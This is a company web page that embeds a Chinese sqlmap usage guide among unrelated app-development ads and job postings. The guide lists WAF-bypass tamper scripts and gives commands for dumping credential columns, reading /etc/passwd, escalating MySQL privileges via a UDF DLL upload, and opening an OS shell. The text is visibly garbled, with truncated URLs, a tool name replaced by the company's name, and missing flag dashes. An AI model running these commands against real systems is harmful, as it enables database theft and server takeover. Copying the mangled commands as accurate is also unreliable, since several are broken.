全国咨询热线:18720358503

sqlmap使用攻略

类别:企业荣誉 发布时间:2020-11-03 浏览人次:

APP平台开发、电商平台开发的整体解决方案服务

广州凡科APP开发公司提供超过5种主流开发服务,IOS开发、android开发,微信商城开发、小程序商城开发、商城网站开发;


iOS开发

专注于高端型IOS系统开发,提供优质的IOS APP开发设计方案服务。

Android开发

针对主流的android系统,提供一站式APP咨询、策划、开发服务。

微信商城开发

针对企业需求提供专业微信公众平台开发服务,让微营销更简单!

小程序商城开发

借助微信实现裂变传播的小程序商城,带来原生商城app流畅体验

商城网站建设

针对高端商城开发需求客户,提供高端型商城网站定制开发服务。



sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

sqlmap目前最新版本为1.1.8-8,相关资源如下:

官方网站:p>

apostrophemask.py用utf8代替引号

equaltolike.pylike代替等号

space2dash.py 绕过过滤 = 替换空格字符( ),( )后跟一个破折号注释,一个随机字符串和一个新行( n )

greatest.py 绕过过滤 ,用GREATEST替换大于号。

space2hash.py空格替换为#号,随机字符串以及换行符

apostrophenullencode.py绕过过滤双引号,替换字符和双引号。

halfversionedmorekeywords.py当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

space2morehash.py空格替换为 #号 以及更多随机字符串 换行符

appendnullbyte.py在有效负荷结束位置加载零字节字符编码

ifnull2ifisnull.py 绕过对IFNULL过滤,替换类似 IFNULL(A,B) 为 IF(ISNULL(A), B, A)

space2mssqlblank.py(mssql)空格替换为其它空符号

base64encode.py 用base64编码替换

space2mssqlhash.py 替换空格

modsecurityversioned.py过滤空格,包含完整的查询版本注释

space2mysqlblank.py 空格替换其它空白符号(mysql)

between.py用between替换大于号( )

space2mysqldash.py替换空格字符( )( )后跟一个破折号注释一个新行( n )

multiplespaces.py围绕SQL关键字添加多个空格

space2plus.py用+替换空格

bluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句,然后替换=为like

nonrecursivereplacement.py双重查询语句,取代SQL关键字

space2randomblank.py代替空格字符( )从一个随机的空白字符可选字符的有效集

sp_password.py追加sp_password 从DBMS日志的自动模糊处理的有效载荷的末尾

chardoubleencode.py双url编码(不处理以编码的)

unionalltounion.py替换UNION ALLSELECT UNION SELECT

charencode.py url编码

randomcase.py随机大小写

unmagicquotes.py宽字符绕过 GPCaddslashes

charunicodeencode.py字符串 unicode 编码

securesphere.py追加特制的字符串

versionedmorekeywords.py注释绕过

halfversionedmorekeywords.py关键字前加注释

2. URL重写SQL注入测试

value1为测试参数,加 * 即可,sqlmap将会测试value1的位置是否可注入。

sqlmap.py -u p>

4. 获取表中的数据个数

sqlmap.py -u p>

7.使用hex避免字符编码导致数据丢失

sqlmap.py -u p>

8.模拟测试手机环境站点

python sqlmap.py -u p>

9.智能判断测试

sqlmap.py -u p>

10.结合bur凡科抠图uite进行注入

(1)bur凡科抠图uite抓包,需要设置bur凡科抠图uite记录请求日志

sqlmap.py -r bur凡科抠图uite抓包.txt

(2)指定表单注入

sqlmap.py -u URL data username=a password=a

11.sqlmap自动填写表单注入

自动填写表单:

sqlmap.py -u URL forms

sqlmap.py -u URL forms dbs

sqlmap.py -u URL forms current-db

sqlmap.py -u URL forms -D 数据库名称 tables

sqlmap.py -u URL forms -D 数据库名称 -T 表名 columns

sqlmap.py -u URL forms -D 数据库名称 -T 表名 -Cusername,password dump

12.读取linux下文件

sqlmap.py-u url file /etc/password

13.延时注入

sqlmap.py -u URL technique -T current-user

14. sqlmap 结合bur凡科抠图uite进行post注入

结合bur凡科抠图uite来使用sqlmap:

(1)浏览器打开目标地址p>

(2)配置burp代理(127.0.0.1:8080)以拦截请求

(3)点击登录表单的submit按钮

(4)Burp会拦截到了我们的登录POST请求

(5)把这个post请求复制为txt, 我这命名为post.txt 然后把它放至sqlmap目录下

(6)运行sqlmap并使用如下命令:

./sqlmap.py -r post.txt -p tfUPass 15.sqlmap cookies注入

sqlmap.py -u base.PHP cookies id=1 dbs level 2

默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用 level 参数且数值 =2的时候也会检查cookie里面的参数,当 =3的时候将检查User-agent和Referer。可以通过bur凡科抠图uite等工具获取当前的cookie值,然后进行注入:

sqlmap.py -u 注入点URL --cookie id=xx --level 3

sqlmap.py -u url --cookie id=xx --level 3 --tables(猜表名)

sqlmap.py -u url --cookie id=xx --level 3 -T 表名 --coiumns

sqlmap.py -u url --cookie id=xx --level 3 -T 表名 -C username,password --dump

16.mysql提权

(1)连接mysql数据打开一个交互shell:

sqlmap.py -dmysql://root:.0.1:3306/test --sql-shell

select @@version;

select @@plugin_dir;

d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\

(2)利用sqlmap上传lib_mysqludf_sys到MySQL插件目录:

sqlmap.py -dmysql://root:.0.1:3306/test --file-write=d:/tmp/lib_mysqludf_sys.dll--file-dest=d:\\wamp2.5\\bin\\mysql\\mysql5.6.17\\lib\\plugin\\lib_mysqludf_sys.dll

CREATE FUNCTION sys_exec RETURNS STRINGSONAME lib_mysqludf_sys.dll

CREATE FUNCTION sys_eval RETURNS STRINGSONAME lib_mysqludf_sys.dll

select sys_eval( ver

17.执行shell命令

sqlmap.py -u url os-cmd= netuser /*执行net user命令*/

sqlmap.py -u url os-shell /*系统交互的shell*/

18.延时注入

sqlmap dbs -u url delay 0.5 /*延时0.5秒*/

sqlmap dbs -u url safe-freq /*请求2次*/

除非注明,否则文章均由 广州凡科科技 整理发布,欢迎转载。

如果喜欢,可以点此订阅本站

推荐阅读

广州凡科互联网科技股份有限公司招聘供应链总

招聘人数:17职位信息1、依据公司营销计划,建立并优化采购计划,生产计划,物流计划等计划管理体系,有力保证订单的及时交付;2、组织制定并完善供应链各管理制度,依据公司战...

2020-11-01
营销推广型网站与展现型网站孰优孰劣,营销推

营销推广型网站与展现型网站孰优孰劣,营销推广网站和展现型网站差别在哪儿里?公司企业网站建设是挑选营销推广网站,還是展现型网站,许多公司对营销推广网站不太掌握,造成公...

2020-10-24
企业网站建设中怎样维护自身的网站在的全部图

如今网站照片维护也要增加幅度,一些企业将从别人那边盗取好看的照片,这类个人行为好像不谋而合,密秘的,同行业中也是有人那样做,但针对原創企业来讲,这便是损害。由于她...

2020-10-24
企业网站建设在挑选网站域名时要留意事宜是啥

企业网站建设在挑选网站域名时要留意事宜是啥呢?域名太重要,是企业网站建设中的关键原素,今日网站制作与大伙儿共享企业网站建设在挑选网站域名时要留意事宜,期待对您有一...

2020-10-24
广州凡科互联网科技股份有限公司招聘8-13K华师驾

招聘人数:12职位信息岗位职责:1、依据公司提供的优质意向资源,进行前期咨询与沟通;2、根据每月招生计划,进行目标分解,公司对接驾校十几家,资源丰富,不用开发2、维护客户...

2020-10-24
中小型公司网站建设提升必须留意什么关键点,

中小型公司网站建设提升必须留意什么关键点,该如何提升?伴随着互连网的发展趋势,如今无论是啥种类的公司,都是有自身的官方网网站。不但仅是以便能够紧跟时期的发展趋势脚...

2020-10-24
X

400-8700-61718720358503
企业邮箱2639601583@qq.com
官方微信